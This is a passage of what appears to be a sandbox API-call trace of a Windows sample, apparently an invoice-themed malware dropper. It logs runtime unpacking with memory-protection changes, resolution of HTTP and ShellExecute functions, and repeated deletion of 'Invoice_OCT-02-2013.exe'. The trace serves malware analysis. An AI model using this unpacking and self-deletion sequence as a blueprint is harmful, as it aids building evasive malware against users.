Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.663] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.664] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.665] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.666] DestroyWindow (hWnd=0x80046) [0126.666] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0126.668] PostQuitMessage (nExitCode=6) [0126.672] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0126.682] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0126.682] UpdateWindow (hWnd=0x0) returned 0 [0126.682] GetMessageA (in: lpMsg=0x505248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x505248) returned 0 [0126.684] VirtualAlloc (lpAddress=0x0, dwSize=0x48e4, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0126.684] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0126.684] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x460000 [0126.684] VirtualAlloc (lpAddress=0x460000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x460000 [0126.685] VirtualAlloc (lpAddress=0x461000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x461000 [0126.685] VirtualAlloc (lpAddress=0x462000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x462000 [0126.685] VirtualAlloc (lpAddress=0x463000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x463000 [0126.685] VirtualAlloc (lpAddress=0x464000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x464000 [0126.686] VirtualAlloc (lpAddress=0x465000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x465000 [0126.686] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x715c0000 [0126.693] GetProcAddress (hModule=0x715c0000, lpProcName="HttpSendRequestW") returned 0x71686ef0 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="InternetSetOptionW") returned 0x7168da70 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="InternetQueryOptionW") returned 0x7168cd20 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="HttpOpenRequestW") returned 0x71640fd0 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="HttpQueryInfoW") returned 0x7168f060 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="InternetReadFile") returned 0x71647320 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="InternetConnectW") returned 0x716745f0 [0126.694] GetProcAddress (hModule=0x715c0000, lpProcName="InternetOpenW") returned 0x71688490 [0126.694] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x770a0000 [0126.694] GetProcAddress (hModule=0x770a0000, lpProcName="GetTempPathW") returned 0x770c6b30 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="GetFileSize") returned 0x770c6a70 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="GetCurrentDirectoryW") returned 0x770ba9a0 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteFileW") returned 0x770c68c0 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="CloseHandle") returned 0x770c6630 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="WriteFile") returned 0x770c6ca0 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="lstrcmpW") returned 0x770b7970 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="ReadFile") returned 0x770c6bb0 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="GetModuleHandleW") returned 0x770b9bc0 [0126.695] GetProcAddress (hModule=0x770a0000, lpProcName="ExitProcess") returned 0x770c7b30 [0126.696] GetProcAddress (hModule=0x770a0000, lpProcName="HeapCreate") returned 0x770ba100 [0126.696] GetProcAddress (hModule=0x770a0000, lpProcName="HeapAlloc") returned 0x77252bd0 [0126.696] GetProcAddress (hModule=0x770a0000, lpProcName="GetModuleFileNameW") returned 0x770b9b00 [0126.696] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFileW") returned 0x770c6890 [0126.696] GetProcAddress (hModule=0x770a0000, lpProcName="lstrlenW") returned 0x770b3690 [0126.696] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74c10000 [0126.696] GetProcAddress (hModule=0x74c10000, lpProcName="wsprintfW") returned 0x74c3f890 [0126.696] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75ca0000 [0126.733] GetProcAddress (hModule=0x75ca0000, lpProcName="ShellExecuteW") returned 0x75e3d9f0 [0126.734] VirtualProtect (in: lpAddress=0x460000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff1c | out: lpflOldProtect=0x19ff1c*=0x4) returned 1 [0126.735] VirtualProtect (in: lpAddress=0x461000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0126.736] VirtualProtect (in: lpAddress=0x462000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0126.738] VirtualProtect (in: lpAddress=0x463000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0126.739] VirtualProtect (in: lpAddress=0x464000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0126.741] VirtualProtect (in: lpAddress=0x465000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x19fea0 | out: lpflOldProtect=0x19fea0*=0x4) returned 1 [0126.742] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.745] GetModuleHandleW (lpModuleName=0x0) returned 0x460000 [0126.745] HeapCreate (flOptions=0x0, dwInitialSize=0x2000, dwMaximumSize=0x0) returned 0x22c0000 [0126.746] RtlAllocateHeap (HeapHandle=0x22c0000, Flags=0x8, Size=0x2000) returned 0x22c05a8 [0126.746] RtlAllocateHeap (HeapHandle=0x22c0000, Flags=0x8, Size=0x2000) returned 0x22c25b0 [0126.746] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22c05a8, nSize=0x2000 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\asih.exe")) returned 0x2d [0126.746] GetTempPathW (in: nBufferLength=0x1000, lpBuffer=0x22c25b0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0126.746] wsprintfW (in: param_1=0x22c25b0, param_2="%s%s" | out: param_1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe") returned 45 [0126.746] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\asih.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0126.747] GetFileSize (in: hFile=0x190, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe74 [0126.747] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe") returned 45 [0126.747] RtlAllocateHeap (HeapHandle=0x22c0000, Flags=0x8, Size=0xbed2) returned 0x1fb0048 [0126.748] ReadFile (in: hFile=0x190, lpBuffer=0x1fb0048, nNumberOfBytesToRead=0xbe74, lpNumberOfBytesRead=0x19ff74, lpOverlapped=0x0 | out: lpBuffer=0x1fb0048*, lpNumberOfBytesRead=0x19ff74*=0xbe74, lpOverlapped=0x0) returned 1 [0126.748] lstrcmpW (lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe", lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe") returned 0 [0126.769] CloseHandle (hObject=0x190) returned 1 [0126.769] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.771] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.772] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.773] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.773] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.773] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.773] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.774] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.775] DeleteFileW 